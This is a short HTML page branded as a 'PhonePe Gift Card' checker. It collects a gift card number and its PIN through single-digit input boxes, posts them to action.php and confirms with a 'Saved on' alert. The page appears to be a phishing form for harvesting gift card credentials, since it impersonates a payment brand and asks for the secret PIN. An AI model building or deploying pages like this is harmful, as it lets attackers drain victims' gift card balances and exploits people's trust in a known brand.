<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <head>
            <title>PhonePe Gift Card</title>
        </head>
        <style>
            .body{
                margin: 0;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
            }
            .center-container{
                text-align: center;
                margin-top: 70px;
            }
            .card-container{
                background-color: #fff;
                padding: 20px 10px;
                border: 1px solid #000000;
                border-radius: 8px;
                box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
                text-align: center;
                margin: 20px 300px;
            }
            .cardinputs{
                display: block;
                justify-content: center;
                margin: 20px 0;
                padding: 20px 10px;
            }
            input {
                width: 30px;
                height: 30px;
                margin: 0 5px;
                text-align: center;
                font-size: 16px;
                border: 1px solid #ccc;
                border-radius: 4px;
            }
            .image-box {
                text-align: center;
                border: 2px solid #1c1d1d00; /* Border color */
                border-radius: 8px;
                padding: 20px 20px; 
            }
            .image-box img{
                max-width: 10%;
                height: auto;
                border-radius: 4px;
            }
            button {
                background-color: #4caf50;
                color: #fff;
                border: none;
                padding: 10px 20px;
                font-size: 16px;
                cursor: pointer;
                border-radius: 4px;
            }
            @media (max-width: 600px) {
                .card-container {
                    margin: 20px 5px; 
                }
                .cardinputs {
                    display: block;
                    flex-wrap: wrap;
                    justify-content: center;
                    align-items: center;
                }
                
                input {
                    width: 15px;
                    height: 15px;
                    margin: 5px;
                }
                .cardinputs h2{
                    display: flex;
                    flex-direction: column;
                }
            }
    
        </style>
        <script>
            function moveToNext(currentInput, nextInputName) {
                const maxLength = parseInt(currentInput.getAttribute('maxlength'));
                const currentLength = currentInput.value.length;
    
                if (currentLength === maxLength) {
                    const nextInput = document.getElementsByName(nextInputName)[0];
                    if (nextInput) {
                        nextInput.focus();
                    }
                }
                else if (currentLength === 0) {
                    const previousInput = currentInput.previousElementSibling;
                    if (previousInput) {
                        previousInput.focus();
                    }
                }
            }
            function submit(){
                alert("Saved on "+new Date());
            }
        </script>
        <body>
            <div class="center-container">
            <div class="card-container">
                <div class="image-box">
                    <img src="gift-box.png">
                </div>
                <h1>Check PhonePe Gift Card</h1>
                <form action="action.php" method="post">
                    <div class="cardinputs">
                        <h2>Gift Card Number </h2><br>
                        <h2>XXXX-XXXX-</h2>
                        <input type="text" name="digit1" maxlength="1" required oninput="moveToNext(this, 'digit2')">
                        <input type="text" name="digit2" maxlength="1" required oninput="moveToNext(this, 'digit3')">
                        <input type="text" name="digit3" maxlength="1" required oninput="moveToNext(this, 'digit4')">
                        <input type="text" name="digit4" maxlength="1" required oninput="moveToNext(this, 'digit5')">
                        <label>-</label>
                        <input type="text" name="digit5" maxlength="1" required oninput="moveToNext(this, 'digit6')">
                        <input type="text" name="digit6" maxlength="1" required oninput="moveToNext(this, 'digit7')">
                        <input type="text" name="digit7" maxlength="1" required oninput="moveToNext(this, 'digit8')">
                        <input type="text" name="digit8" maxlength="1" required oninput="moveToNext(this, 'digit8')">
                    </div>
                    <div class="cardinputs">
                        <label>PIN</label>
                        <input type="text" name="digit9" maxlength="1" required oninput="moveToNext(this, 'digit10')">
                        <input type="text" name="digit10" maxlength="1" required oninput="moveToNext(this, 'digit11')">
                        <input type="text" name="digit11" maxlength="1" required oninput="moveToNext(this, 'digit12')">
                        <input type="text" name="digit12" maxlength="1" required oninput="moveToNext(this, 'digit13')">
                        <input type="text" name="digit13" maxlength="1" required oninput="moveToNext(this, 'digit14')">
                        <input type="text" name="digit14" maxlength="1" required oninput="moveToNext(this, 'digit14')">
                    </div>
                    <button type="submit" onclick="submit()">SUBMIT</button>
                </form>
            </div>
        </div>
        
        </body>
</html>